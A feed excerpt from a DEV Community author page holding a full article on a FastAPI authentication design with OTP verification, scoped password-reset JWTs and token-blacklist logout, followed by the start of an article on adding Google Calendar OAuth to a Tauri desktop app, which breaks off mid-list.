The latest articles on DEV Community by Yar Khan (@yarkhan02). https://dev.to/yarkhan02 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3328153%2F62a5d2d0-4e35-4d49-ab2c-afd9cf0583fe.jpg https://dev.to/yarkhan02 en Yar Khan Tue, 24 Mar 2026 11:56:51 +0000 https://dev.to/yarkhan02/secure-authentication-fastapi-otp-jwt-2mjp https://dev.to/yarkhan02/secure-authentication-fastapi-otp-jwt-2mjp <p>This document explains the complete authentication design, with a strong focus on security controls and implementation details.</p> <h2> What This Auth System Covers </h2> <ol> <li>User registration with hashed password storage</li> <li>Email OTP verification with anti-abuse controls</li> <li>Login gated by email verification</li> <li>Password reset using OTP + short-lived purpose-scoped token</li> <li>Logout with JWT revocation (token blacklist)</li> </ol> <h2> Security Goals </h2> <p>The flow is designed to prevent:</p> <ol> <li>Unauthorized login before email ownership is verified</li> <li>OTP brute-force and OTP resend spam</li> <li>Reset-token misuse outside password reset flow</li> <li>Continued use of access tokens after logout</li> </ol> <h2> High-Level Flow </h2> <ol> <li>Register: create user (<code>verified=False</code>)</li> <li>Send OTP: <code>POST /auth/otp/send</code> </li> <li>Verify OTP: <code>POST /auth/otp/verify</code> -&gt; marks user verified</li> <li>Login: <code>POST /auth/login</code> -&gt; JWT only for verified users</li> <li>Forgot password: <ol> <li><code>POST /auth/otp/send</code></li> <li> <code>POST /auth/verify-reset</code> -&gt; short-lived token (<code>purpose=password_reset</code>)</li> <li> <code>POST /auth/reset-password</code> with reset token</li> </ol> </li> <li>Logout: <code>POST /auth/logout</code> -&gt; token added to blacklist</li> </ol> <h2> Architecture Diagram </h2> <h3> Registration Flow </h3> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5chgljaslxg3c1wcje3o.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5chgljaslxg3c1wcje3o.png" alt="Registration Flow" width="800" height="520"></a></p> <h3> Password Reset Flow </h3> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1vint5qbxg654wpyq7n9.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1vint5qbxg654wpyq7n9.png" alt="Password Reset Flow" width="800" height="453"></a></p> <h2> Core Endpoints </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># backend/app/routers/auth_router.py </span> <span class="nd">@router.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/register</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">register</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">UserRegister</span><span class="p">,</span> <span class="n">service</span><span class="p">:</span> <span class="n">AuthService</span><span class="p">):</span> <span class="k">return</span> <span class="n">service</span><span class="p">.</span><span class="nf">register</span><span class="p">(</span><span class="n">request</span><span class="p">)</span> <span class="nd">@router.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">UserLogin</span><span class="p">,</span> <span class="n">service</span><span class="p">:</span> <span class="n">AuthService</span><span class="p">):</span> <span class="k">return</span> <span class="n">service</span><span class="p">.</span><span class="nf">login</span><span class="p">(</span><span class="n">request</span><span class="p">)</span> <span class="nd">@router.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/otp/send</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">send_otp</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">OTPRequest</span><span class="p">,</span> <span class="n">service</span><span class="p">:</span> <span class="n">AuthService</span><span class="p">,</span> <span class="n">background_tasks</span><span class="p">:</span> <span class="n">BackgroundTasks</span><span class="p">):</span> <span class="k">return</span> <span class="n">service</span><span class="p">.</span><span class="nf">send_otp</span><span class="p">(</span><span class="n">email</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">email</span><span class="p">,</span> <span class="n">background_tasks</span><span class="o">=</span><span class="n">background_tasks</span><span class="p">)</span> <span class="nd">@router.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/otp/verify</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">verify_otp</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">OTPVerifyRequest</span><span class="p">,</span> <span class="n">service</span><span class="p">:</span> <span class="n">AuthService</span><span class="p">):</span> <span class="k">return</span> <span class="n">service</span><span class="p">.</span><span class="nf">verify_otp</span><span class="p">(</span><span class="n">email</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">email</span><span class="p">,</span> <span class="n">input_code</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">code</span><span class="p">)</span> <span class="nd">@router.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/verify-reset</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">forgot_password</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">OTPVerifyRequest</span><span class="p">,</span> <span class="n">service</span><span class="p">:</span> <span class="n">AuthService</span><span class="p">):</span> <span class="k">return</span> <span class="n">service</span><span class="p">.</span><span class="nf">verify_reset_otp</span><span class="p">(</span><span class="n">email</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">email</span><span class="p">,</span> <span class="n">input_code</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">code</span><span class="p">)</span> <span class="nd">@router.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/reset-password</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">reset_password</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">PasswordResetRequest</span><span class="p">,</span> <span class="n">user</span><span class="p">:</span> <span class="n">PasswordResetUser</span><span class="p">,</span> <span class="n">service</span><span class="p">:</span> <span class="n">AuthService</span><span class="p">):</span> <span class="k">return</span> <span class="n">service</span><span class="p">.</span><span class="nf">reset_password</span><span class="p">(</span><span class="n">email</span><span class="o">=</span><span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">new_password</span><span class="p">)</span> <span class="nd">@router.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/logout</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">logout</span><span class="p">(</span><span class="n">block_token</span><span class="p">:</span> <span class="n">BlockToken</span><span class="p">):</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Logout successful</span><span class="sh">"</span><span class="p">}</span> </code></pre> </div> <h2> Request Validation </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># backend/app/schemas/user_schema.py </span><span class="k">class</span> <span class="nc">UserRegister</span><span class="p">(</span><span class="n">BaseModel</span><span class="p">):</span> <span class="n">email</span><span class="p">:</span> <span class="n">EmailStr</span> <span class="n">password</span><span class="p">:</span> <span class="nb">str</span> <span class="n">confirm_password</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Field</span><span class="p">(</span><span class="n">alias</span><span class="o">=</span><span class="sh">"</span><span class="s">confirmPassword</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># backend/app/schemas/otp_schema.py </span><span class="k">class</span> <span class="nc">OTPRequest</span><span class="p">(</span><span class="n">BaseModel</span><span class="p">):</span> <span class="n">email</span><span class="p">:</span> <span class="n">EmailStr</span> <span class="k">class</span> <span class="nc">OTPVerifyRequest</span><span class="p">(</span><span class="n">BaseModel</span><span class="p">):</span> <span class="n">email</span><span class="p">:</span> <span class="n">EmailStr</span> <span class="n">code</span><span class="p">:</span> <span class="nb">str</span> <span class="k">class</span> <span class="nc">PasswordResetRequest</span><span class="p">(</span><span class="n">BaseModel</span><span class="p">):</span> <span class="n">new_password</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="nc">Field</span><span class="p">(</span><span class="n">alias</span><span class="o">=</span><span class="sh">"</span><span class="s">newPassword</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <h2> OTP Security Model </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># backend/app/otp/otp_manager.py </span><span class="k">class</span> <span class="nc">OTPManager</span><span class="p">:</span> <span class="n">OTP_LENGTH</span> <span class="o">=</span> <span class="mi">6</span> <span class="n">OTP_EXPIRY_MINUTES</span> <span class="o">=</span> <span class="mi">10</span> <span class="n">MAX_ATTEMPTS</span> <span class="o">=</span> <span class="mi">5</span> <span class="n">MAX_RESENDS</span> <span class="o">=</span> <span class="mi">3</span> <span class="n">LOCKOUT_MINUTES</span> <span class="o">=</span> <span class="mi">15</span> <span class="n">RATE_LIMIT_SECONDS</span> <span class="o">=</span> <span class="mi">60</span> </code></pre> </div> <p>Controls implemented:</p> <ol> <li>Cryptographically secure OTP generation (<code>secrets</code>)</li> <li>OTP hash storage (<code>SHA-256</code>) instead of plaintext</li> <li>10-minute OTP TTL</li> <li>Resend rate limit (60s)</li> <li>Max resend cap (3)</li> <li>Max failed attempts (5) + temporary lockout (15m)</li> </ol> <h2> Registration Logic </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">register</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user</span><span class="p">:</span> <span class="n">UserRegister</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">UserResponse</span><span class="p">:</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="n">password</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">400</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Password must be at least 8 characters</span><span class="sh">"</span><span class="p">)</span> <span class="n">is_valid</span><span class="p">,</span> <span class="n">error_msg</span> <span class="o">=</span> <span class="nf">validate_email_address</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">is_valid</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">400</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="n">error_msg</span><span class="p">)</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">user_repo</span><span class="p">.</span><span class="nf">is_user_exists</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="n">email</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">400</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Account with this email already exists</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">user</span><span class="p">.</span><span class="n">password</span> <span class="o">!=</span> <span class="n">user</span><span class="p">.</span><span class="n">confirm_password</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">400</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Password and confirm password do not match</span><span class="sh">"</span><span class="p">)</span> <span class="n">hashed_password</span> <span class="o">=</span> <span class="nf">hash_password</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="n">password</span><span class="p">)</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">user_repo</span><span class="p">.</span><span class="nf">create_user</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="n">email</span><span class="p">,</span> <span class="n">hashed_password</span><span class="p">)</span> </code></pre> </div> <p>Security notes:</p> <ol> <li>Password is never stored plaintext</li> <li>User remains unverified until OTP verification succeeds</li> </ol> <h2> OTP Send + Verify Logic </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">send_otp</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">email</span><span class="p">:</span> <span class="n">EmailStr</span><span class="p">,</span> <span class="n">background_tasks</span><span class="p">:</span> <span class="n">BackgroundTasks</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">dict</span><span class="p">:</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">is_rate_limited</span><span class="p">(</span><span class="n">email</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">429</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Please wait before requesting another code</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">is_locked</span><span class="p">(</span><span class="n">email</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Account locked temporarily</span><span class="sh">"</span><span class="p">)</span> <span class="n">existing</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">get_otp</span><span class="p">(</span><span class="n">email</span><span class="p">)</span> <span class="k">if</span> <span class="n">existing</span> <span class="ow">and</span> <span class="n">existing</span><span class="p">.</span><span class="n">resend_count</span> <span class="o">&gt;=</span> <span class="n">OTPManager</span><span class="p">.</span><span class="n">MAX_RESENDS</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">429</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Maximum OTP requests exceeded</span><span class="sh">"</span><span class="p">)</span> <span class="n">otp_code</span> <span class="o">=</span> <span class="n">OTPManager</span><span class="p">.</span><span class="nf">generate_otp</span><span class="p">()</span> <span class="n">code_hash</span> <span class="o">=</span> <span class="n">OTPManager</span><span class="p">.</span><span class="nf">hash_otp</span><span class="p">(</span><span class="n">otp_code</span><span class="p">)</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">create_or_update_otp</span><span class="p">(</span><span class="n">email</span><span class="p">,</span> <span class="n">code_hash</span><span class="p">)</span> <span class="n">background_tasks</span><span class="p">.</span><span class="nf">add_task</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">email_service</span><span class="p">.</span><span class="n">send_email</span><span class="p">,</span> <span class="n">email_data</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">OTP sent successfully</span><span class="sh">"</span><span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">_verify_otp_core</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">email</span><span class="p">:</span> <span class="n">EmailStr</span><span class="p">,</span> <span class="n">input_code</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">is_locked</span><span class="p">(</span><span class="n">email</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">403</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Account is temporarily locked</span><span class="sh">"</span><span class="p">)</span> <span class="n">otp_record</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">get_otp</span><span class="p">(</span><span class="n">email</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">otp_record</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">404</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">No OTP found for this email</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">datetime</span><span class="p">.</span><span class="nf">now</span><span class="p">(</span><span class="n">timezone</span><span class="p">.</span><span class="n">utc</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">otp_record</span><span class="p">.</span><span class="n">expires_at</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">400</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">OTP has expired</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">OTPManager</span><span class="p">.</span><span class="nf">verify_otp</span><span class="p">(</span><span class="n">input_code</span><span class="p">,</span> <span class="n">otp_record</span><span class="p">.</span><span class="n">code_hash</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">increment_attempts</span><span class="p">(</span><span class="n">email</span><span class="p">)</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">400</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Invalid OTP</span><span class="sh">"</span><span class="p">)</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">mark_verified</span><span class="p">(</span><span class="n">email</span><span class="p">)</span> <span class="n">self</span><span class="p">.</span><span class="n">otp_repo</span><span class="p">.</span><span class="nf">delete_otp</span><span class="p">(</span><span class="n">email</span><span class="p">)</span> </code></pre> </div> <p><code>verify_otp</code> uses this core and marks user email verified.</p> <h2> Login Logic </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">user_data</span><span class="p">:</span> <span class="n">UserLogin</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">TokenResponse</span><span class="p">:</span> <span class="n">user</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">user_repo</span><span class="p">.</span><span class="nf">get_user_by_email</span><span class="p">(</span><span class="n">user_data</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="k">if</span> <span class="n">user</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">user</span><span class="p">.</span><span class="n">verified</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Email address not verified</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">user</span> <span class="ow">or</span> <span class="ow">not</span> <span class="nf">verify_password</span><span class="p">(</span><span class="n">user_data</span><span class="p">.</span><span class="n">password</span><span class="p">,</span> <span class="n">user</span><span class="p">.</span><span class="n">password</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Incorrect email or password</span><span class="sh">"</span><span class="p">)</span> <span class="n">access_token</span> <span class="o">=</span> <span class="nf">create_access_token</span><span class="p">(</span><span class="n">data</span><span class="o">=</span><span class="p">{</span> <span class="sh">"</span><span class="s">sub</span><span class="sh">"</span><span class="p">:</span> <span class="n">user</span><span class="p">.</span><span class="n">email</span><span class="p">,</span> <span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">:</span> <span class="nf">str</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="nb">id</span><span class="p">),</span> <span class="sh">"</span><span class="s">subscription</span><span class="sh">"</span><span class="p">:</span> <span class="p">{...}</span> <span class="p">})</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">access_token</span><span class="sh">"</span><span class="p">:</span> <span class="n">access_token</span><span class="p">,</span> <span class="sh">"</span><span class="s">token_type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">bearer</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">:</span> <span class="n">user</span><span class="p">}</span> </code></pre> </div> <p>Security behavior:</p> <ol> <li>Unverified users are denied</li> <li>Password verification uses Argon2 helper</li> <li>JWT includes expiry claim (<code>exp</code>)</li> </ol> <h2> Password Reset (Scoped Token) </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">verify_reset_otp</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">email</span><span class="p">:</span> <span class="n">EmailStr</span><span class="p">,</span> <span class="n">input_code</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="nf">_verify_otp_core</span><span class="p">(</span><span class="n">email</span><span class="p">,</span> <span class="n">input_code</span><span class="p">)</span> <span class="n">access_token</span> <span class="o">=</span> <span class="nf">create_access_token</span><span class="p">(</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">:</span> <span class="n">email</span><span class="p">,</span> <span class="sh">"</span><span class="s">purpose</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">password_reset</span><span class="sh">"</span><span class="p">},</span> <span class="n">expires_delta</span><span class="o">=</span><span class="nf">timedelta</span><span class="p">(</span><span class="n">minutes</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span> <span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">OTP verified</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">access_token</span><span class="sh">"</span><span class="p">:</span> <span class="n">access_token</span><span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">get_password_reset_user</span><span class="p">(</span><span class="n">credentials</span><span class="p">:</span> <span class="n">HTTPAuthorizationCredentials</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">security</span><span class="p">)):</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">decode_access_token</span><span class="p">(</span><span class="n">credentials</span><span class="p">.</span><span class="n">credentials</span><span class="p">)</span> <span class="k">if</span> <span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">purpose</span><span class="sh">"</span><span class="p">)</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">password_reset</span><span class="sh">"</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Invalid token purpose</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>This prevents normal access tokens from being used to reset passwords.</p> <h2> Logout + Token Revocation </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">block_token_logout</span><span class="p">(</span><span class="n">credentials</span><span class="p">:</span> <span class="n">HTTPAuthorizationCredentials</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">security</span><span class="p">),</span> <span class="n">db</span><span class="p">:</span> <span class="n">Session</span> <span class="o">=</span> <span class="nc">Depends</span><span class="p">(</span><span class="n">get_db</span><span class="p">))</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="n">token</span> <span class="o">=</span> <span class="n">credentials</span><span class="p">.</span><span class="n">credentials</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">decode_access_token</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> <span class="n">expires_at</span> <span class="o">=</span> <span class="n">datetime</span><span class="p">.</span><span class="nf">fromtimestamp</span><span class="p">(</span><span class="n">payload</span><span class="p">[</span><span class="sh">"</span><span class="s">exp</span><span class="sh">"</span><span class="p">],</span> <span class="n">tz</span><span class="o">=</span><span class="n">timezone</span><span class="p">.</span><span class="n">utc</span><span class="p">)</span> <span class="nc">TokenBlacklistRepository</span><span class="p">(</span><span class="n">db</span><span class="p">).</span><span class="nf">add_token</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">payload</span><span class="p">[</span><span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">],</span> <span class="n">expires_at</span><span class="p">)</span> <span class="k">return</span> <span class="bp">True</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">get_current_user</span><span class="p">(...):</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">decode_access_token</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> <span class="k">if</span> <span class="nc">TokenBlacklistRepository</span><span class="p">(</span><span class="n">db</span><span class="p">).</span><span class="nf">is_blacklisted</span><span class="p">(</span><span class="n">token</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">HTTPException</span><span class="p">(</span><span class="n">status_code</span><span class="o">=</span><span class="mi">401</span><span class="p">,</span> <span class="n">detail</span><span class="o">=</span><span class="sh">"</span><span class="s">Token has been revoked</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>This gives immediate logout invalidation, even for unexpired JWTs.</p> <h2> Data Model Notes </h2> <h3> OTP Table </h3> <ol> <li> <code>email</code> (PK)</li> <li><code>code_hash</code></li> <li><code>expires_at</code></li> <li><code>last_sent_at</code></li> <li><code>attempts</code></li> <li><code>resend_count</code></li> <li><code>verified</code></li> <li><code>locked_until</code></li> <li>optional audit fields (<code>ip_address</code>, <code>user_agent</code>)</li> </ol> <h3> Users Table </h3> <ol> <li><code>email</code></li> <li> <code>password</code> (hashed)</li> <li><code>verified</code></li> </ol> <h2> Final Takeaway </h2> <p>This auth flow is a strong security baseline: verification-first onboarding, abuse-resistant OTP lifecycle, scoped password reset, and revocable JWT sessions. With secret management and a few operational hardening steps, it is production-ready for security-sensitive workloads.</p> fastapi authentication oauth jwt Yar Khan Tue, 10 Feb 2026 15:56:46 +0000 https://dev.to/yarkhan02/building-google-calendar-oauth-for-a-desktop-app-2bbn https://dev.to/yarkhan02/building-google-calendar-oauth-for-a-desktop-app-2bbn <p>I recently added Google Calendar integration to my Tauri desktop app, and honestly, it was more interesting than I expected. OAuth in desktop apps is a different beast than web apps - there's no domain, no guaranteed redirect URL, and you're running entirely on the user's machine.</p> <p>Here's the story of how I got it working, complete with code and the lessons learned.</p> <h2> The Challenge </h2> <p>I wanted users to connect their Google Calendar so my task manager could:</p> <ul> <li>Create calendar events for tasks with deadlines</li> <li>Update events when tasks change</li> <li>Delete events when tasks are completed</li> <li>Sync reminder frequencies</li> </ul> <p>Simple enough, right? Well...</p> <h3> Attempt 1: Device Code Flow (Failed) </h3> <p>My initial plan was Google's Device Code Flow - that TV-style flow where you show users a code and tell them to visit <code>google.com/device</code>. Seemed perfect:</p> <ul> <li>No localhost server needed</li> <li>Works on any device</li> <li>User-friendly for limited-input devices</li> </ul> <p>But here's what went wrong:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// Device Flow attempt - didn't work!</span> <span class="k">let</span> <span class="n">response</span> <span class="o">=</span> <span class="n">client</span> <span class="nf">.post</span><span class="p">(</span><span class="s">"https://oauth2.googleapis.com/device/code"</span><span class="p">)</span> <span class="nf">.form</span><span class="p">(</span><span class="o">&amp;</span><span class="p">[(</span><span class="s">"client_id"</span><span class="p">,</span> <span class="n">CLIENT_ID</span><span class="p">),</span> <span class="p">(</span><span class="s">"scope"</span><span class="p">,</span> <span class="n">SCOPES</span><span class="p">)])</span> <span class="nf">.send</span><span class="p">()</span> <span class="k">.await</span><span class="o">?</span><span class="p">;</span> <span class="c1">// Error: 401 Unauthorized</span> <span class="c1">// "error": "invalid_client",</span> <span class="c1">// "error_description": "Invalid client type."</span> </code></pre> </div> <p>The issues:</p> <ol> <li> <strong>Wrong credential type</strong>: Device Flow requires "TVs and Limited Input devices" OAuth client type</li> <li> <strong>Desktop app credentials don't work</strong>: My "Desktop app" credentials were rejected</li> <li> 